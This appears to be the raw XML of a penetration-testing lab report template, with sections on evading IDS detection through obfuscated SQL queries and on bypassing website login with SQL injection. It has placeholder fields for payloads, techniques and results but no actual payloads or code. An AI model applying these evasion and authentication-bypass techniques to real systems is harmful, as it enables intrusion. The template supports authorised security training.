          </w:p>
          <w:p w14:paraId="1A6875A4" w14:textId="77777777" w:rsidR="00F34346" w:rsidRPr="005D2C80" w:rsidRDefault="00F34346" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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F34346" w:rsidRPr="00A51A96" w14:paraId="5C007795" w14:textId="77777777" w:rsidTr="00863625">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9230" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="12C99FB4" w14:textId="2E34242E" w:rsidR="00F34346" w:rsidRPr="003C713F" w:rsidRDefault="00F34346" w:rsidP="00972D9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7.14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F34346">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Evade IDS Detection using Obfuscated Code</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="03F956FA" w14:textId="77777777" w:rsidR="00F34346" w:rsidRPr="00863625" w:rsidRDefault="00F34346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A177D5" w:rsidRPr="00A177D5" w14:paraId="5CCBC7E0" w14:textId="77777777" w:rsidTr="0086362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8134442" w14:textId="77777777" w:rsidR="00A177D5" w:rsidRPr="00A177D5" w:rsidRDefault="00A177D5" w:rsidP="00863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177D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62E6455" w14:textId="77777777" w:rsidR="00A177D5" w:rsidRPr="00A177D5" w:rsidRDefault="00A177D5" w:rsidP="00A177D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177D5" w:rsidRPr="00A177D5" w14:paraId="0D92E2E9" w14:textId="77777777" w:rsidTr="0086362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0BFC2A8" w14:textId="77777777" w:rsidR="00A177D5" w:rsidRPr="00A177D5" w:rsidRDefault="00A177D5" w:rsidP="00863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177D5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79B5830" w14:textId="77777777" w:rsidR="00A177D5" w:rsidRPr="00A177D5" w:rsidRDefault="00A177D5" w:rsidP="00A177D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177D5" w:rsidRPr="00A177D5" w14:paraId="6B596C64" w14:textId="77777777" w:rsidTr="0086362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717C455" w14:textId="77777777" w:rsidR="00A177D5" w:rsidRPr="00A177D5" w:rsidRDefault="00A177D5" w:rsidP="00863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177D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5D3D9DA" w14:textId="77777777" w:rsidR="00A177D5" w:rsidRPr="00A177D5" w:rsidRDefault="00A177D5" w:rsidP="00A177D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177D5" w:rsidRPr="00A177D5" w14:paraId="12935773" w14:textId="77777777" w:rsidTr="0086362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0A01D41" w14:textId="77777777" w:rsidR="00A177D5" w:rsidRPr="00A177D5" w:rsidRDefault="00A177D5" w:rsidP="00863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177D5">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Queries used with Obfuscated Code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98F3A39" w14:textId="77777777" w:rsidR="00A177D5" w:rsidRPr="00A177D5" w:rsidRDefault="00A177D5" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="148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6B9A754" w14:textId="77777777" w:rsidR="00A177D5" w:rsidRPr="00A177D5" w:rsidRDefault="00A177D5" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14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B54F67E" w14:textId="77777777" w:rsidR="00A177D5" w:rsidRPr="00A177D5" w:rsidRDefault="00A177D5" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14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581035C" w14:textId="77777777" w:rsidR="00A177D5" w:rsidRPr="00A177D5" w:rsidRDefault="00A177D5" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14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16AB41D" w14:textId="77777777" w:rsidR="00A177D5" w:rsidRPr="00A177D5" w:rsidRDefault="00A177D5" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14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58CB89E" w14:textId="77777777" w:rsidR="00A177D5" w:rsidRPr="00A177D5" w:rsidRDefault="00A177D5" w:rsidP="00A177D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F6BD5" w:rsidRPr="00A177D5" w14:paraId="5C438DAB" w14:textId="77777777" w:rsidTr="0086362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6ECAB37" w14:textId="21F6208D" w:rsidR="00AF6BD5" w:rsidRPr="00A177D5" w:rsidRDefault="00AF6BD5" w:rsidP="00863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F6BD5">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>IDS/IPS in Place?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890B817" w14:textId="77777777" w:rsidR="00AF6BD5" w:rsidRPr="00AF6BD5" w:rsidRDefault="00AF6BD5" w:rsidP="00AF6BD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AF6BD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[*Yes/No, Type: Network-based, Host-based, etc.]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10710E70" w14:textId="5F9613C2" w:rsidR="00AF6BD5" w:rsidRPr="00A177D5" w:rsidRDefault="00AF6BD5" w:rsidP="00AF6BD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70764" w:rsidRPr="00A177D5" w14:paraId="36E96B39" w14:textId="77777777" w:rsidTr="0086362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5A8BA2B" w14:textId="32339D28" w:rsidR="00E70764" w:rsidRPr="00AF6BD5" w:rsidRDefault="00E70764" w:rsidP="00863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70764">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>SQL Injection Obfuscation Techniques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4FADC7C" w14:textId="77777777" w:rsidR="00E70764" w:rsidRPr="00AF6BD5" w:rsidRDefault="00E70764" w:rsidP="00AF6BD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E70764" w:rsidRPr="00A177D5" w14:paraId="36F4CFDC" w14:textId="77777777" w:rsidTr="0086362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F346BA6" w14:textId="270DDCA4" w:rsidR="00E70764" w:rsidRPr="00E70764" w:rsidRDefault="00E70764" w:rsidP="00863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70764">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Obfuscation Method Attempted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D343FFD" w14:textId="77777777" w:rsidR="00E70764" w:rsidRDefault="00E70764" w:rsidP="00AF6BD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E7076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Concatenation, Encryption, Hashing, Character Manipulation,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5DB9385" w14:textId="77777777" w:rsidR="00E70764" w:rsidRDefault="00E70764" w:rsidP="00AF6BD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91287E9" w14:textId="6CDBEE15" w:rsidR="00E70764" w:rsidRPr="00AF6BD5" w:rsidRDefault="00E70764" w:rsidP="00AF6BD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A177D5" w:rsidRPr="00A177D5" w14:paraId="22BF1C20" w14:textId="77777777" w:rsidTr="0086362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98E8648" w14:textId="77777777" w:rsidR="00A177D5" w:rsidRPr="00A177D5" w:rsidRDefault="00A177D5" w:rsidP="00863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177D5">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Bypassed Signature Detection of the IDS System Successfully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2BC25824" w14:textId="77777777" w:rsidR="00A177D5" w:rsidRPr="00A177D5" w:rsidRDefault="00A177D5" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="149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A177D5">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24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59BC2AB4" w14:textId="77777777" w:rsidR="00A177D5" w:rsidRPr="00A177D5" w:rsidRDefault="00A177D5" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="149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A177D5">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00E70764" w:rsidRPr="00A177D5" w14:paraId="5D6D3540" w14:textId="77777777" w:rsidTr="0086362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C15F804" w14:textId="1A76E42C" w:rsidR="00E70764" w:rsidRPr="00A177D5" w:rsidRDefault="00E70764" w:rsidP="00863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70764">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Obfuscated Query Variations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0F19F757" w14:textId="77777777" w:rsidR="00E70764" w:rsidRPr="00E70764" w:rsidRDefault="00E70764" w:rsidP="00E7076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E7076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[*Examples of Modified Queries Used for Testing]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="140D7CA0" w14:textId="77777777" w:rsidR="00E70764" w:rsidRDefault="00E70764" w:rsidP="00E7076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F8C1E25" w14:textId="0E28D5CB" w:rsidR="00E70764" w:rsidRPr="00A177D5" w:rsidRDefault="00E70764" w:rsidP="00E7076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70764" w:rsidRPr="00A177D5" w14:paraId="748259C1" w14:textId="77777777" w:rsidTr="0086362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2888DB9" w14:textId="167BBE89" w:rsidR="00E70764" w:rsidRPr="00E70764" w:rsidRDefault="00E70764" w:rsidP="00863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70764">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Obfuscated Request Variations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65CF54F8" w14:textId="77777777" w:rsidR="00E70764" w:rsidRDefault="00E70764" w:rsidP="00E7076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E7076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Examples of Requests Attempted for Signature Bypass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9D37CDF" w14:textId="77777777" w:rsidR="00E70764" w:rsidRDefault="00E70764" w:rsidP="00E7076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BB1F148" w14:textId="4EED1F97" w:rsidR="00E70764" w:rsidRPr="00E70764" w:rsidRDefault="00E70764" w:rsidP="00E7076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A177D5" w:rsidRPr="00A177D5" w14:paraId="3F8C9068" w14:textId="77777777" w:rsidTr="00863625">
        <w:trPr>
          <w:trHeight w:val="152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8A6BE36" w14:textId="65495C60" w:rsidR="00A177D5" w:rsidRPr="00A177D5" w:rsidRDefault="00E70764" w:rsidP="00863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70764">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>IDS Detection Outcome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FDBD523" w14:textId="77777777" w:rsidR="00A177D5" w:rsidRPr="00A177D5" w:rsidRDefault="00A177D5" w:rsidP="00A177D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70764" w:rsidRPr="00A177D5" w14:paraId="7178952A" w14:textId="77777777" w:rsidTr="00863625">
        <w:trPr>
          <w:trHeight w:val="152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33D4718" w14:textId="14DA96E0" w:rsidR="00E70764" w:rsidRPr="00E70764" w:rsidRDefault="00E70764" w:rsidP="00863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 xml:space="preserve">Other </w:t>
            </w:r>
            <w:r w:rsidRPr="00E70764">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b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0DD3649" w14:textId="77777777" w:rsidR="00E70764" w:rsidRPr="00A177D5" w:rsidRDefault="00E70764" w:rsidP="00A177D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177D5" w:rsidRPr="00A177D5" w14:paraId="66FECF24" w14:textId="77777777" w:rsidTr="0086362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E8CC6D1" w14:textId="77777777" w:rsidR="00A177D5" w:rsidRPr="00A177D5" w:rsidRDefault="00A177D5" w:rsidP="00863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177D5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9B3FC05" w14:textId="77777777" w:rsidR="00A177D5" w:rsidRPr="00A177D5" w:rsidRDefault="00A177D5" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="150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8D81938" w14:textId="77777777" w:rsidR="00A177D5" w:rsidRPr="00A177D5" w:rsidRDefault="00A177D5" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15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54C452C" w14:textId="77777777" w:rsidR="00A177D5" w:rsidRPr="00A177D5" w:rsidRDefault="00A177D5" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15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A067BEE" w14:textId="77777777" w:rsidR="00A177D5" w:rsidRPr="00A177D5" w:rsidRDefault="00A177D5" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15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5CD3638" w14:textId="77777777" w:rsidR="00A177D5" w:rsidRPr="00A177D5" w:rsidRDefault="00A177D5" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15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CA5FD99" w14:textId="77777777" w:rsidR="00A177D5" w:rsidRPr="00A177D5" w:rsidRDefault="00A177D5" w:rsidP="00A177D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281D190E" w14:textId="77777777" w:rsidR="009E27C2" w:rsidRDefault="009E27C2" w:rsidP="009E27C2">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D2C80">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Results Analysis: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F56EE85" w14:textId="77777777" w:rsidR="009E27C2" w:rsidRPr="00B07F1E" w:rsidRDefault="009E27C2" w:rsidP="009E27C2">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b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27C2" w:rsidRPr="005D2C80" w14:paraId="1EEC2B2B" w14:textId="77777777" w:rsidTr="00972D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="45096C9C" w14:textId="77777777" w:rsidR="009E27C2" w:rsidRPr="005D2C80" w:rsidRDefault="009E27C2" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="15988619" w14:textId="77777777" w:rsidR="009E27C2" w:rsidRPr="005D2C80" w:rsidRDefault="009E27C2" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="175D365D" w14:textId="77777777" w:rsidR="009E27C2" w:rsidRDefault="009E27C2" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6DFB59FC" w14:textId="77777777" w:rsidR="009E27C2" w:rsidRDefault="009E27C2" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="75AA3CD2" w14:textId="77777777" w:rsidR="009E27C2" w:rsidRPr="005D2C80" w:rsidRDefault="009E27C2" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7E06BF6C" w14:textId="77777777" w:rsidR="00F34346" w:rsidRDefault="00F34346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3E6652" w:rsidRPr="00A51A96" w14:paraId="02363056" w14:textId="77777777" w:rsidTr="00863625">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9140" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="6F1E8DE3" w14:textId="0E0607B2" w:rsidR="003E6652" w:rsidRPr="003C713F" w:rsidRDefault="003E6652" w:rsidP="00972D9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7.15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3E6652">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Bypass Website Authentication using SQL Injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2CA4253E" w14:textId="77777777" w:rsidR="009E27C2" w:rsidRPr="00863625" w:rsidRDefault="009E27C2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3E6652" w:rsidRPr="003E6652" w14:paraId="027817F7" w14:textId="77777777" w:rsidTr="0086362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079C842" w14:textId="77777777" w:rsidR="003E6652" w:rsidRPr="003E6652" w:rsidRDefault="003E6652" w:rsidP="00863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E6652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B0463DE" w14:textId="77777777" w:rsidR="003E6652" w:rsidRPr="003E6652" w:rsidRDefault="003E6652" w:rsidP="003E665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E6652" w:rsidRPr="003E6652" w14:paraId="322CBCBD" w14:textId="77777777" w:rsidTr="0086362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43C09D0" w14:textId="77777777" w:rsidR="003E6652" w:rsidRPr="003E6652" w:rsidRDefault="003E6652" w:rsidP="00863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E6652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E515B6A" w14:textId="77777777" w:rsidR="003E6652" w:rsidRPr="003E6652" w:rsidRDefault="003E6652" w:rsidP="003E665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E6652" w:rsidRPr="003E6652" w14:paraId="1324A4F4" w14:textId="77777777" w:rsidTr="0086362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9516038" w14:textId="77777777" w:rsidR="003E6652" w:rsidRPr="003E6652" w:rsidRDefault="003E6652" w:rsidP="00863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E6652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1E54213" w14:textId="77777777" w:rsidR="003E6652" w:rsidRPr="003E6652" w:rsidRDefault="003E6652" w:rsidP="003E665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E6652" w:rsidRPr="003E6652" w14:paraId="5C929FD9" w14:textId="77777777" w:rsidTr="00863625">
        <w:trPr>
          <w:trHeight w:val="2132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FD8D424" w14:textId="77777777" w:rsidR="003E6652" w:rsidRPr="003E6652" w:rsidRDefault="003E6652" w:rsidP="00863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E6652">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Queries Used to Bypass Website Authentication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C4F6F6D" w14:textId="77777777" w:rsidR="003E6652" w:rsidRPr="003E6652" w:rsidRDefault="003E6652" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="153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E72764C" w14:textId="77777777" w:rsidR="003E6652" w:rsidRPr="003E6652" w:rsidRDefault="003E6652" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15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8312950" w14:textId="77777777" w:rsidR="003E6652" w:rsidRPr="003E6652" w:rsidRDefault="003E6652" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15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10AA486" w14:textId="77777777" w:rsidR="003E6652" w:rsidRPr="003E6652" w:rsidRDefault="003E6652" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15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05686F2" w14:textId="77777777" w:rsidR="003E6652" w:rsidRPr="003E6652" w:rsidRDefault="003E6652" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15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283925C" w14:textId="77777777" w:rsidR="003E6652" w:rsidRPr="003E6652" w:rsidRDefault="003E6652" w:rsidP="003E665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82A18" w:rsidRPr="003E6652" w14:paraId="3E096DC3" w14:textId="77777777" w:rsidTr="00863625">
        <w:trPr>
          <w:trHeight w:val="98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76AC7F0" w14:textId="43C37F38" w:rsidR="00E82A18" w:rsidRPr="003E6652" w:rsidRDefault="00E82A18" w:rsidP="00863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82A18">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>SQL Injection Techniques Attempted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6852C84" w14:textId="5EC97EED" w:rsidR="00E82A18" w:rsidRPr="00E82A18" w:rsidRDefault="00E82A18" w:rsidP="00E82A1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E82A1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[*Sign-in Form Manipulation, UNION-based Injection, MD5 Hash Bypass, etc.]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003E6652" w:rsidRPr="003E6652" w14:paraId="1B2DDB57" w14:textId="77777777" w:rsidTr="0086362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00B3A88" w14:textId="77777777" w:rsidR="003E6652" w:rsidRPr="003E6652" w:rsidRDefault="003E6652" w:rsidP="00863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E6652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Bypassed Website Authentication using SQL Injection Successfully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49D13245" w14:textId="77777777" w:rsidR="003E6652" w:rsidRPr="003E6652" w:rsidRDefault="003E6652" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="152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3E6652">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24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79826A1D" w14:textId="77777777" w:rsidR="003E6652" w:rsidRPr="003E6652" w:rsidRDefault="003E6652" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="152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3E6652">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>No</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003E6652" w:rsidRPr="003E6652" w14:paraId="5F6614CE" w14:textId="77777777" w:rsidTr="00863625">
        <w:trPr>
          <w:trHeight w:val="1034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944555F" w14:textId="0A79CD41" w:rsidR="003E6652" w:rsidRPr="003E6652" w:rsidRDefault="00E82A18" w:rsidP="00863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82A18">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>SQL Injection Payloads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D8C0343" w14:textId="77777777" w:rsidR="003E6652" w:rsidRPr="003E6652" w:rsidRDefault="003E6652" w:rsidP="003E665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82A18" w:rsidRPr="003E6652" w14:paraId="43D969F2" w14:textId="77777777" w:rsidTr="00863625">
        <w:trPr>
          <w:trHeight w:val="1034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56BFCF0" w14:textId="39D2F002" w:rsidR="00E82A18" w:rsidRPr="00E82A18" w:rsidRDefault="00E82A18" w:rsidP="00863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82A18">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Vulnerable Authentication Fields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9FC7C0D" w14:textId="77777777" w:rsidR="00E82A18" w:rsidRPr="00E82A18" w:rsidRDefault="00E82A18" w:rsidP="003E665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E82A1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[*Username, Password, Token, etc.]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="020FFAF5" w14:textId="77777777" w:rsidR="00E82A18" w:rsidRDefault="00E82A18" w:rsidP="003E665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AD3365C" w14:textId="4A1A6766" w:rsidR="00E82A18" w:rsidRPr="003E6652" w:rsidRDefault="00E82A18" w:rsidP="003E665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3219E" w:rsidRPr="003E6652" w14:paraId="451CBB5E" w14:textId="77777777" w:rsidTr="00863625">
        <w:trPr>
          <w:trHeight w:val="1034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28DC2B5" w14:textId="2BA9A325" w:rsidR="00F3219E" w:rsidRPr="00E82A18" w:rsidRDefault="00F3219E" w:rsidP="00863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3219E">
              <w:rPr>
                <w:rFonts w:eastAsia="Calibri" w:cs="Georgia"/>
                <w:b/>
                <w:kern w:val="0"/>
                <w:szCs w:val="24"/>
                <w14:ligatures w14:val="none"/>
              </w:rPr>
              <w:t>Error Messages or Debug Information Disclosed?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3739B61" w14:textId="26D54D95" w:rsidR="00F3219E" w:rsidRPr="00E82A18" w:rsidRDefault="00F3219E" w:rsidP="003E665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F3219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 if found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FE360F" w:rsidRPr="003E6652" w14:paraId="6A67D831" w14:textId="77777777" w:rsidTr="00863625">
        <w:trPr>
          <w:trHeight w:val="1034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A54DDBD" w14:textId="608515A9" w:rsidR="00FE360F" w:rsidRPr="00F3219E" w:rsidRDefault="00FE360F" w:rsidP="00863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Evidence Collected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4CB6829" w14:textId="0DA21705" w:rsidR="00FE360F" w:rsidRDefault="00FE360F" w:rsidP="003E665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[*If Any]</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FE360F" w:rsidRPr="003E6652" w14:paraId="7A5B9AB3" w14:textId="77777777" w:rsidTr="00863625">
        <w:trPr>
          <w:trHeight w:val="1034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6477887" w14:textId="5C21FB57" w:rsidR="00FE360F" w:rsidRDefault="00FE360F" w:rsidP="00863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Remediation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EE7B6C5" w14:textId="77777777" w:rsidR="00FE360F" w:rsidRDefault="00FE360F" w:rsidP="003E665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E6652" w:rsidRPr="003E6652" w14:paraId="6D81DB7D" w14:textId="77777777" w:rsidTr="00863625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A38F927" w14:textId="77777777" w:rsidR="003E6652" w:rsidRPr="003E6652" w:rsidRDefault="003E6652" w:rsidP="0086362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E6652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6BB309A" w14:textId="77777777" w:rsidR="003E6652" w:rsidRPr="003E6652" w:rsidRDefault="003E6652" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="151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64438D7" w14:textId="77777777" w:rsidR="003E6652" w:rsidRPr="003E6652" w:rsidRDefault="003E6652" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15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2459973" w14:textId="77777777" w:rsidR="003E6652" w:rsidRPr="003E6652" w:rsidRDefault="003E6652" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15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31CA8AB" w14:textId="77777777" w:rsidR="003E6652" w:rsidRPr="003E6652" w:rsidRDefault="003E6652" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15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D7F846E" w14:textId="77777777" w:rsidR="003E6652" w:rsidRPr="003E6652" w:rsidRDefault="003E6652" w:rsidP="008A7361">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15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00867C5" w14:textId="77777777" w:rsidR="003E6652" w:rsidRPr="003E6652" w:rsidRDefault="003E6652" w:rsidP="003E665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74321A28" w14:textId="77777777" w:rsidR="00376F13" w:rsidRDefault="00376F13" w:rsidP="00376F13">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D2C80">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Results Analysis: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4122595B" w14:textId="77777777" w:rsidR="00376F13" w:rsidRPr="00B07F1E" w:rsidRDefault="00376F13" w:rsidP="00376F13">
      <w:pPr>
        <w:spacing w:before="120" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b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6F13" w:rsidRPr="005D2C80" w14:paraId="2C90DD53" w14:textId="77777777" w:rsidTr="00972D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5DCAD664" w14:textId="77777777" w:rsidR="00376F13" w:rsidRPr="005D2C80" w:rsidRDefault="00376F13" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="498FAE77" w14:textId="77777777" w:rsidR="00376F13" w:rsidRPr="005D2C80" w:rsidRDefault="00376F13" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2824F9E7" w14:textId="77777777" w:rsidR="00376F13" w:rsidRDefault="00376F13" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2D93D142" w14:textId="77777777" w:rsidR="00376F13" w:rsidRDefault="00376F13" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1ACFAF9D" w14:textId="77777777" w:rsidR="00376F13" w:rsidRPr="005D2C80" w:rsidRDefault="00376F13" w:rsidP="00972D9E">
            <w:pPr>
              <w:spacing w:before="120"/>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="64C2B2B2" w14:textId="37AEE7C6" w:rsidR="001943CB" w:rsidRDefault="001943CB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BFE61C8" w14:textId="77777777" w:rsidR="001943CB" w:rsidRDefault="001943CB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w: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0A0EDF" w:rsidRPr="00A51A96" w14:paraId="0233F923" w14:textId="77777777" w:rsidTr="00843719">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9140" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E8E8E8" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="1C4E482F" w14:textId="3520F70B" w:rsidR="000A0EDF" w:rsidRPr="003C713F" w:rsidRDefault="000A0EDF" w:rsidP="00972D9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7.16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0A0EDF">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
